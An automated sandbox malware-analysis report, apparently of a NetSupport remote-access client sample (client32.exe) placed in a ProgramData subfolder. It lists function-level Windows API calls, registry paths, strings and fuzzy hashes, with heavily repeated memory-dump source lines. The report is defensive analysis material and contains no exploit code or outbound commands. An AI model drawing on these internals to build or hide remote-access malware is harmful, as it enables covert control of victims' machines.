%s%s%s.bin, xrefs: 11032061

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %s%s%s.bin$506013$_HF$_HW$_SW
API String ID: 2111968516-3361648832
Opcode ID: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
Instruction ID: fa910be19caf0a14a4f119543ead50e584fafd0cecff00e00c2366bf95bcdf21
Opcode Fuzzy Hash: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
Instruction Fuzzy Hash: 2AE092A4E5460C9BF300A6498C11BAAFACC174475BFC4C051BFF9AB6A3E9299904C6D2

Function 11103630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11103683
GetStockObject.GDI32(00000004), ref: 111036DB
RegisterClassA.USER32(?), ref: 111036EF
CreateWindowExA.USER32 ref: 1110372C

Strings

NSMDesktopWnd, xrefs: 11103669, 111036E8, 11103726

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomClassCreateGlobalObjectRegisterStockWindow
String ID: NSMDesktopWnd
API String ID: 2669163067-206650970
Opcode ID: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
Instruction ID: a046934e961b92c42b42225909fe4a4d9db65d03d00dbebfa88e6fdde24b4f4f
Opcode Fuzzy Hash: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
Instruction Fuzzy Hash: E031F4B4D01719AFCB44CFA9D980AAEFBF8FB08314F50462EE42AE3244E7355900CB94

Function 11145F00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11145F70
RegCloseKey.ADVAPI32(?), ref: 11145FD4

Strings

SOFTWARE\NetSupport Ltd\PCICTL, xrefs: 11145F50
ForceRTL, xrefs: 11145F93
SOFTWARE\Productive Computer Insight\PCICTL, xrefs: 11145F37, 11145F6E

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpen
String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
API String ID: 47109696-3245241687
Opcode ID: 1e58ccc398f601655cd21bbef7fe8258e694ae66d2ba0236151b0d49e381710a
Instruction ID: 1d1f817806b548678a0140876f7b35b9e852c49707e53231e183cf95c3cf5809
Opcode Fuzzy Hash: 1e58ccc398f601655cd21bbef7fe8258e694ae66d2ba0236151b0d49e381710a
Instruction Fuzzy Hash: 1E21DD71E0022A9BE764DA64CD80FDEF778AB45718F1041AAE81DF3941D7319D458BA3

Function 111121E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 11112140: GetSystemDirectoryA.KERNEL32(?,00000104,?), ref: 1111216A
Part of subcall function 11112140: __wsplitpath.LIBCMT ref: 11112185
Part of subcall function 11112140: GetVolumeInformationA.KERNEL32 ref: 111121B9

GetComputerNameA.KERNEL32(?,?), ref: 11112288

Strings

, xrefs: 11112281
ACM, xrefs: 11112242
\Registry\Machine\SOFTWARE\Classes\N%x.%s, xrefs: 11112297
\Registry\Machine\SOFTWARE\Classes\N%x, xrefs: 11112230

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
API String ID: 806825551-1858614750
Opcode ID: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
Instruction ID: ca260b95ce0435fc80d5678de4b29a4f2f4f697687454b99fdfeb2ddb07782e0
Opcode Fuzzy Hash: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
Instruction Fuzzy Hash: C62149B6A042855AD701CE70DD80BFFFFAADB8A204F1445B8D851CB545E736D604C390

Function 11144DD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 111447F0: GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
Part of subcall function 111447F0: GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\x225qa0\client32.exe,00000104,?,11144A43,?), ref: 11144819

WaitForMultipleObjects.KERNEL32 ref: 11144E25
ResetEvent.KERNEL32(00000128), ref: 11144E39
SetEvent.KERNEL32(00000128), ref: 11144E4F
WaitForMultipleObjects.KERNEL32 ref: 11144E5E

Strings

MiniDump, xrefs: 11144DD7

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
String ID: MiniDump
API String ID: 1494854734-2840755058
Opcode ID: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
Instruction ID: ea994b22643fb5a56552c53957c3f10a02c9a0f0123a866c2d557df6367c4d32
Opcode Fuzzy Hash: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
Instruction Fuzzy Hash: 1F112975A8412577E710DBA8DC81F9BF768AB04B28F200230E634E7AC4EB74A50587A1

Function 111107B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32(B24479DC,00000000,00000000,?,00000000,?,11070D57,00000001,?), ref: 111107DA
EnterCriticalSection.KERNEL32(00000000,?,11070D57,00000001,?), ref: 111107E9
LeaveCriticalSection.KERNEL32(00000000,?,00000000,?), ref: 1111085C

Part of subcall function 11110430: InitializeCriticalSection.KERNEL32(JN,B24479DC,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110464
Part of subcall function 11110430: EnterCriticalSection.KERNEL32(JN,B24479DC,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110480
Part of subcall function 11110430: LeaveCriticalSection.KERNEL32(JN,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 111104C8

Strings

..\ctl32\Refcount.cpp, xrefs: 11110846
p.second, xrefs: 1111084B

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$CurrentInitializeThread
String ID: ..\ctl32\Refcount.cpp$p.second
API String ID: 2150084884-3525309832
Opcode ID: 5d34d5a2f9ef7af3e15489c9f102d339edae3b080d450e09a8618edefa1c9ce3
Instruction ID: 4a48ad72accfbd502157f99f66ad332c5968b241778b91a05df5760bf403e04f
Opcode Fuzzy Hash: 5d34d5a2f9ef7af3e15489c9f102d339edae3b080d450e09a8618edefa1c9ce3
Instruction Fuzzy Hash: 4D21A476E04619AFD711DFA4C881BEFF7B8FB19704F10422AE922A7A80D7346505CBA0

Function 111479B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

LoadStringA.USER32 ref: 111479DF
wsprintfA.USER32 ref: 11147A16

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

i < _tsizeof (buf), xrefs: 11147A30
#%d, xrefs: 11147A10
..\ctl32\util.cpp, xrefs: 11147A2B

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastLoadMessageProcessString
String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
API String ID: 1985783259-2296142801
Opcode ID: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
Instruction ID: f4f04ea69c0c381d0959b313e9907706ba85fe26c30e15a9a088fcfc7c116df7
Opcode Fuzzy Hash: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
Instruction Fuzzy Hash: 6811E5FAE00218A7D710DEA49D81FEAF36C9B44608F100165FB08F6141EB70AA05CBE4

Function 111101B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 111101C9

Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56

wsprintfA.USER32 ref: 111101E4

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

_memset.LIBCMT ref: 11110207

Strings

..\ctl32\Refcount.cpp, xrefs: 111101F5
Can't alloc %u bytes, xrefs: 111101DE

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
API String ID: 3234921582-2664294811
Opcode ID: 280ad6f88800d969d30347863d68ea4ddbfee66c9be73721bdded0e9d7f91acb
Instruction ID: 098e5996781ad60247c7fcf5caa4ca36f886f8102b778af333740a2f918ca33d
Opcode Fuzzy Hash: 280ad6f88800d969d30347863d68ea4ddbfee66c9be73721bdded0e9d7f91acb
Instruction Fuzzy Hash: C0F0F6B6E4022863C7209AA49D01FEFF37C9F91609F0001A9FE05B7241EA75AA11C7E5

Function 11031F30 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11031FE6

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

clientinv.cpp, xrefs: 11031F5E
506013, xrefs: 11031FC7
m_pDoInv == NULL, xrefs: 11031F63
%s%s.bin, xrefs: 11031FE0

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastMessageProcess
String ID: %s%s.bin$506013$clientinv.cpp$m_pDoInv == NULL
API String ID: 4180936305-4176076045
Opcode ID: 1cb657f4e915e2d1e23f9df1b2d29e1dc20b61536471740f5e16ca5fcb139327
Instruction ID: 4b30c984cb9feb044c1d7ab8c0844ab34c920fbc261825ed793c706054f3ad77
Opcode Fuzzy Hash: 1cb657f4e915e2d1e23f9df1b2d29e1dc20b61536471740f5e16ca5fcb139327
Instruction Fuzzy Hash: D82190B5F00705AFD710CF65CC41BAAB7F4EB88758F10853DE86697681EB35A8008B51

Function 11145240 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(11145918,00000000,?,11145918,00000000), ref: 1114525C
__strdup.LIBCMT ref: 11145277

Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E

Part of subcall function 11145240: _free.LIBCMT ref: 1114529E

_free.LIBCMT ref: 111452AC

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

CreateDirectoryA.KERNEL32(11145918,00000000,?,?,?,11145918,00000000), ref: 111452B7

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
String ID:
API String ID: 398584587-0
Opcode ID: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
Instruction ID: a914e2cea8ad1481f503ba01f1d1a08edacf548165b8a11fd341c03149d2e1b0
Opcode Fuzzy Hash: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
Instruction Fuzzy Hash: 9301D276A04216ABF34115BD6D01FABBB8C8BD2A78F240173F84DD6A81E752E41681A2

Function 1100EE20 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EE52

Part of subcall function 111616DA: _setlocale.LIBCMT ref: 111616EC

_free.LIBCMT ref: 1100EE64

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

_free.LIBCMT ref: 1100EE77
_free.LIBCMT ref: 1100EE8A
_free.LIBCMT ref: 1100EE9D

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 3515823920-0
Opcode ID: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
Instruction ID: a44a88996e3d62c283fa82fd04d5e1258298656dbf2da44853d36c331dab430a
Opcode Fuzzy Hash: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
Instruction Fuzzy Hash: 9511B2F2D046559BE720CF99D800A5BFBECEB50764F144A2AE49AD3640E7B2F904CA51

Function 111464E0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 1114584E
Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB

wsprintfA.USER32 ref: 1114650E
wsprintfA.USER32 ref: 11146524

Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 11143E97
Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
